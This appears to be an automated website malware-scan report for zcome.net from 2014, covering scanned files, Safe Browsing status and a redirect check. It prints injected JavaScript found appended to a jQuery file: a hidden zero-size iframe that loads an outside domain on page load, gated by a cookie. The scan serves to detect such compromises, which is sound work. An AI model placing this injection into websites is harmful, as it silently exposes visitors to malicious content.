Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zcome.net
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zcome.net/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=1 Connection: close Date: Sun, 05 Oct 2014 08:38:32 GMT Location: http://zcome.net/ Server: nginx Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sun, 05 Oct 2014 08:38:08 GMT X-Pingback: http://zcome.net/xmlrpc.php | clean |
http://zcome.net/ | 200 OK Content-Length: 65701 Content-Type: text/html | clean |
http://zcome.net/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 72667 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3379 bytes skipped]... &&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);jQuery.noConflict(); ;var if8y06Y7 = document.createElement('iframe');if8y06Y7.name = 'if8y06Y7';if8y06Y7.src = 'http://asurt.toutges.com/';if8y06Y7.style.width = '0px';if8y06Y7.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if8y06Y7=') == -1) { document.getElementsByTagName('body')[0].appendChild(if8y06Y7);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'if8y06Y7=yes; path=/; expires=' + expiresDate;}}; Antivirus reports:
http://zcome.net/wp-content/themes/chocotheme/js/fn.js | 200 OK Content-Length: 989 Content-Type: application/javascript | clean |
http://www.zcome.net/test404page.js | 404 Not Found Content-Length: 483 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zcome.net
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 05 Oct 2014 08:38:32 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Sun, 05 Oct 2014 08:38:08 GMT
X-Pingback: http://zcome.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: zcome.net
Referer: http://www.google.com/search?q=zcome.net
Result:
The result is similar to the first query. There are no suspicious redirects found.